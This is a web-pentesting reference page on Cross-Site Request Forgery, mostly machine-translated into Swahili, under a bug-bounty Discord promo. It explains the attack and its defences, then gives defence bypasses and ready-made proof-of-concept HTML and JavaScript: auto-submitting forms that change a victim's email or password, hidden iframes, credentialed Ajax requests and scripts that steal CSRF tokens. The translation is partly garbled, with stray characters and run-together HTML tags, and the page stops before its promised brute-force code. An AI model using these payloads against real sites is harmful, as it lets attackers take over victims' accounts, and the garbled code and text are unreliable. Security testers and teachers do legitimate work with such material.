Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!
Hacking Insights
Engage with content that delves into the thrill and challenges of hacking
Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights
Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates
Join us onDiscord and start collaborating with top hackers today!
Cross-Site Request Forgery (CSRF) Explained
Cross-Site Request Forgery (CSRF) ni aina ya udhaifu wa usalama unaopatikana katika programu za wavuti. Inawawezesha washambuliaji kufanya vitendo kwa niaba ya watumiaji wasiojua kwa kutumia vikao vyao vilivyothibitishwa. Shambulio linafanyika wakati mtumiaji, ambaye amejiandikisha kwenye jukwaa la mwathirika, anatembelea tovuti mbaya. Tovuti hii kisha inasababisha maombi kwa akaunti ya mwathirika kupitia mbinu kama vile kutekeleza JavaScript, kuwasilisha fomu, au kupakua picha.
Prerequisites for a CSRF Attack
Ili kutumia udhaifu wa CSRF, masharti kadhaa yanapaswa kutimizwa:
Tafuta Kitendo Chenye Thamani: Mshambuliaji anahitaji kupata kitendo kinachostahili kutumiwa, kama kubadilisha nenosiri la mtumiaji, barua pepe, au kuongeza mamlaka.
Usimamizi wa Kikao: Kikao cha mtumiaji kinapaswa kusimamiwa pekee kupitia kuki au kichwa cha HTTP Basic Authentication, kwani vichwa vingine haviwezi kubadilishwa kwa kusudi hili.
Ukosefu wa Vigezo Visivyoweza Kutabirika: Ombi halipaswi kuwa na vigezo visivyoweza kutabirika, kwani vinaweza kuzuia shambulio.
Quick Check
You could capture the request in Burp and check CSRF protections and to test from the bowser you can click on Copy as fetch and check the request:
Defending Against CSRF
Hatua kadhaa za kinga zinaweza kutekelezwa ili kulinda dhidi ya shambulio la CSRF:
Cross-origin resource sharing: Sera ya CORS ya tovuti ya mwathirika inaweza kuathiri uwezekano wa shambulio, hasa ikiwa shambulio linahitaji kusoma jibu kutoka kwa tovuti ya mwathirika. Learn about CORS bypass.
User Verification: Kuuliza nenosiri la mtumiaji au kutatua captcha kunaweza kuthibitisha nia ya mtumiaji.
Checking Referrer or Origin Headers: Kuthibitisha vichwa hivi kunaweza kusaidia kuhakikisha maombi yanatoka kwa vyanzo vinavyotegemewa. Hata hivyo, kuunda URL kwa uangalifu kunaweza kupita ukaguzi usiofaa, kama vile:
Using http://mal.net?orig=http://example.com (URL inaishia na URL inayotegemewa)
Using http://example.com.mal.net (URL inaanza na URL inayotegemewa)
Modifying Parameter Names: Kubadilisha majina ya vigezo katika maombi ya POST au GET kunaweza kusaidia kuzuia mashambulizi ya kiotomatiki.
CSRF Tokens: Kuingiza token ya kipekee ya CSRF katika kila kikao na kuhitaji token hii katika maombi yanayofuata kunaweza kupunguza hatari ya CSRF kwa kiasi kikubwa. Ufanisi wa token unaweza kuimarishwa kwa kutekeleza CORS.
Kuelewa na kutekeleza ulinzi huu ni muhimu kwa kudumisha usalama na uaminifu wa programu za wavuti.
Defences Bypass
From POST to GET
Labda fomu unayotaka kutumia inPrepared kupeleka POST request with a CSRF token but, unapaswa kuangalia ikiwa GET pia ni halali na ikiwa unapoweka ombi la GET CSRF token bado inathibitishwa.
Lack of token
Programu zinaweza kutekeleza mekanismu ya kuhakiki token wakati zipo. Hata hivyo, udhaifu unatokea ikiwa uthibitishaji unakosolewa kabisa wakati token haipo. Washambuliaji wanaweza kutumia hili kwa kuondoa parameter inayobeba token, si tu thamani yake. Hii inawawezesha kupita mchakato wa uthibitishaji na kufanya shambulio la Cross-Site Request Forgery (CSRF) kwa ufanisi.
CSRF token is not tied to the user session
Programu zisizofunga token za CSRF kwenye vikao vya mtumiaji zina hatari kubwa ya usalama. Mifumo hii inathibitisha token dhidi ya hifadhi ya kimataifa badala ya kuhakikisha kila token inafungwa kwenye kikao kinachoanzisha.
Hapa kuna jinsi washambuliaji wanavyotumia hili:
Authenticate kwa kutumia akaunti yao wenyewe.
Obtain a valid CSRF token kutoka kwenye hifadhi ya kimataifa.
Use this token katika shambulio la CSRF dhidi ya mwathirika.
Udhaifu huu unawawezesha washambuliaji kufanya maombi yasiyoidhinishwa kwa niaba ya mwathirika, wakitumia mchakato wa uthibitishaji wa token usiofaa wa programu.
Method bypass
Ikiwa ombi linatumia "njia"isiyo ya kawaida, angalia ikiwa ufunctionality ya method override inafanya kazi. Kwa mfano, ikiwa inatumia PUT unaweza kujaribu kutumia POST na kutuma: https://example.com/my/dear/api/val/num?_method=PUT
Hii inaweza pia kufanya kazi kwa kutuma parameter ya _method ndani ya ombi la POST au kutumia vichwa:
X-HTTP-Method
X-HTTP-Method-Override
X-Method-Override
Custom header token bypass
Ikiwa ombi linaongeza kichwa cha kawaida chenye token kwa ombi kama njia ya ulinzi wa CSRF, basi:
Jaribu ombi bila Customized Token na pia kichwa.
Jaribu ombi lenye urefu sawa lakini token tofauti.
CSRF token is verified by a cookie
Programu zinaweza kutekeleza ulinzi wa CSRF kwa kuiga token katika kuki na parameter ya ombi au kwa kuweka kuki ya CSRF na kuthibitisha ikiwa token iliyotumwa kwenye backend inalingana na kuki. Programu inathibitisha maombi kwa kuangalia ikiwa token katika parameter ya ombi inalingana na thamani katika kuki.
Hata hivyo, njia hii ina udhaifu kwa mashambulizi ya CSRF ikiwa tovuti ina kasoro zinazomruhusu mshambuliaji kuweka kuki ya CSRF kwenye kivinjari cha mwathirika, kama vile udhaifu wa CRLF. Mshambuliaji anaweza kutumia hili kwa kupakia picha ya udanganyifu inayoweka kuki, ikifuatiwa na kuanzisha shambulio la CSRF.
Below is an example of how an attack could be structured:
<html><!-- CSRF Proof of Concept - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><formaction="https://example.com/my-account/change-email"method="POST"><inputtype="hidden"name="email"value="asd@asd.asd" /><inputtype="hidden"name="csrf"value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" /><inputtype="submit"value="Submit request" /></form><img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
</body></html>
Kumbuka kwamba ikiwa csrf token inahusiana na cookie ya kikao, shambulio hili halitafanya kazi kwa sababu utahitaji kuweka muathirika kikao chako, na hivyo utakuwa unajishambulia mwenyewe.
Mabadiliko ya Aina ya Maudhui
Kulingana na hii, ili kuepuka maombi ya preflight kutumia njia ya POST, hizi ndizo thamani za Aina ya Maudhui zinazoruhusiwa:
application/x-www-form-urlencoded
multipart/form-data
text/plain
Hata hivyo, kumbuka kwamba mantiki ya seva inaweza kutofautiana kulingana na Aina ya Maudhui iliyotumika, hivyo unapaswa kujaribu thamani zilizotajwa na nyingine kama application/json,text/xml, application/xml.
Mfano (kutoka hapa) wa kutuma data ya JSON kama text/plain:
Wakati wa kujaribu kutuma takwimu za JSON kupitia ombi la POST, kutumia Content-Type: application/json katika fomu ya HTML si rahisi moja kwa moja. Vivyo hivyo, kutumia XMLHttpRequest kutuma aina hii ya maudhui huanzisha ombi la preflight. Hata hivyo, kuna mikakati ya kuweza kupita kikomo hiki na kuangalia ikiwa seva inashughulikia takwimu za JSON bila kujali Aina ya Maudhui:
Tumia Aina Mbadala za Maudhui: Tumia Content-Type: text/plain au Content-Type: application/x-www-form-urlencoded kwa kuweka enctype="text/plain" katika fomu. Njia hii inajaribu kuangalia ikiwa backend inatumia takwimu bila kujali Aina ya Maudhui.
Badilisha Aina ya Maudhui: Ili kuepuka ombi la preflight huku ukihakikisha seva inatambua maudhui kama JSON, unaweza kutuma takwimu na Content-Type: text/plain; application/json. Hii haisababishi ombi la preflight lakini inaweza kushughulikiwa ipasavyo na seva ikiwa imewekwa kukubali application/json.
Matumizi ya Faili ya SWF Flash: Njia isiyo ya kawaida lakini inayowezekana inahusisha kutumia faili ya SWF flash ili kupita vizuizi kama hivi. Kwa ufahamu wa kina wa mbinu hii, rejelea hiki chapisho.
Kupita Ukaguzi wa Referrer / Origin
Epuka kichwa cha Referrer
Programu zinaweza kuthibitisha kichwa cha 'Referer' tu wakati kiko. Ili kuzuia kivinjari kutuma kichwa hiki, tagi ya meta ya HTML ifuatayo inaweza kutumika:
<metaname="referrer"content="never">
Hii inahakikisha kuwa kichwa cha 'Referer' hakijajumuishwa, huenda ikapita mchakato wa uthibitishaji katika baadhi ya programu.
Ili kuweka jina la kikoa la seva katika URL ambayo Referrer itatuma ndani ya vigezo unaweza kufanya:
<html><!-- Referrer policy needed to send the qury parameter in the referrer --><head><metaname="referrer"content="unsafe-url"></head><body><script>history.pushState('','','/')</script><formaction="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email"method="POST"><inputtype="hidden"name="email"value="asd@asd.asd" /><inputtype="submit"value="Submit request" /></form><script>// You need to set this or the domain won't appear in the query of the referer headerhistory.pushState("","","?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")document.forms[0].submit();</script></body></html>
HEAD method bypass
Sehemu ya kwanza ya hii CTF writeup inaelezea kwamba mwanzo wa Oak, router imewekwa kushughulikia maombi ya HEAD kama maombi ya GET bila mwili wa jibu - suluhisho la kawaida ambalo haliko pekee kwa Oak. Badala ya mpangilio maalum unaoshughulikia maombi ya HEAD, yanapewa tu mpangilio wa GET lakini programu inatoa tu mwili wa jibu.
Hivyo, ikiwa ombi la GET linapunguziliwa mbali, unaweza tu kutuma ombi la HEAD ambalo litashughulikiwa kama ombi la GET.
Mifano ya Kutumia
Kutoa CSRF Token
Ikiwa CSRF token inatumika kama kinga unaweza kujaribu kutoa kwa kutumia udhaifu wa XSS au udhaifu wa Dangling Markup.
GET kwa kutumia lebo za HTML
<imgsrc="http://google.es?param=VALUE"style="display:none" /><h1>404 - Page not found</h1>The URL you are requesting is no longer available
Mengineyo ya vitambulisho vya HTML5 ambavyo vinaweza kutumika kutuma ombi la GET kiotomatiki ni:
<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><formmethod="GET"action="https://victim.net/email/change-email"><inputtype="hidden"name="email"value="some@email.com" /><inputtype="submit"value="Submit request" /></form><script>document.forms[0].submit();</script></body></html>
Ombi la POST la Fomu
<html><body><script>history.pushState('','','/')</script><formmethod="POST"action="https://victim.net/email/change-email"id="csrfform"><input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<inputtype="submit"value="Submit request" /><imgsrc=xonerror="csrfform.submit();" /> <!-- Way 2 to autosubmit --></form><script>document.forms[0].submit(); //Way 3 to autosubmit</script></body></html>
Ombi la POST la fomu kupitia iframe
<!--The request is sent through the iframe withuot reloading the page--><html><body><iframestyle="display:none"name="csrfframe"></iframe><formmethod="POST"action="/change-email"id="csrfform"target="csrfframe"><inputtype="hidden"name="email"value="some@email.com"autofocusonfocus="csrfform.submit();" /><inputtype="submit"value="Submit request" /></form><script>document.forms[0].submit();</script></body></html>
Ombi la Ajax POST
<script>var xh;if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safarixh=newXMLHttpRequest();}else{// code for IE6, IE5xh=newActiveXObject("Microsoft.XMLHTTP");}xh.withCredentials =true;xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");</script><script>//JQuery version$.ajax({type:"POST",url:"https://google.com",data:"param=value¶m2=value2"})</script>
<--! expl.html --><bodyonload="envia()"><formmethod="POST"id="formulario"action="http://aplicacion.example.com/cambia_pwd.php"><inputtype="text"id="pwd"name="pwd"value="otra nueva"></form><body><script>functionenvia(){document.getElementById("formulario").submit();}</script><!-- public.html --><iframesrc="2-1.html"style="position:absolute;top:-5000"></iframe><h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
K盗 CSRF Token na kutuma ombi la POST
functionsubmitFormWithTokenJS(token) {var xhr =newXMLHttpRequest();xhr.open("POST",POST_URL,true);xhr.withCredentials =true;// Send the proper header information along with the requestxhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");// This is for debugging and can be removedxhr.onreadystatechange=function() {if(xhr.readyState ===XMLHttpRequest.DONE&&xhr.status ===200) {//console.log(xhr.responseText);}}xhr.send("token="+ token +"&otherparama=heyyyy");}functiongetTokenJS() {var xhr =newXMLHttpRequest();// This tels it to return it as a HTML documentxhr.responseType ="document";xhr.withCredentials =true;// true on the end of here makes the call asynchronousxhr.open("GET",GET_URL,true);xhr.onload=function (e) {if (xhr.readyState ===XMLHttpRequest.DONE&&xhr.status ===200) {// Get the document from the responsepage =xhr.response// Get the input elementinput =page.getElementById("token");// Show the token//console.log("The token is: " + input.value);// Use the token to submit the formsubmitFormWithTokenJS(input.value);}};// Make the requestxhr.send(null);}varGET_URL="http://google.com?param=VALUE"varPOST_URL="http://google.com?param=VALUE"getTokenJS();
K盗a CSRF Token na kutuma ombi la Post kwa kutumia iframe, fomu na Ajax
Msimbo unaweza kutumika kufanya Brut Force fomu ya kuingia kwa kutumia token ya CSRF (Pia inatumia kichwa X-Forwarded-For kujaribu kupita uwezekano wa kuorodheshwa kwa IP):
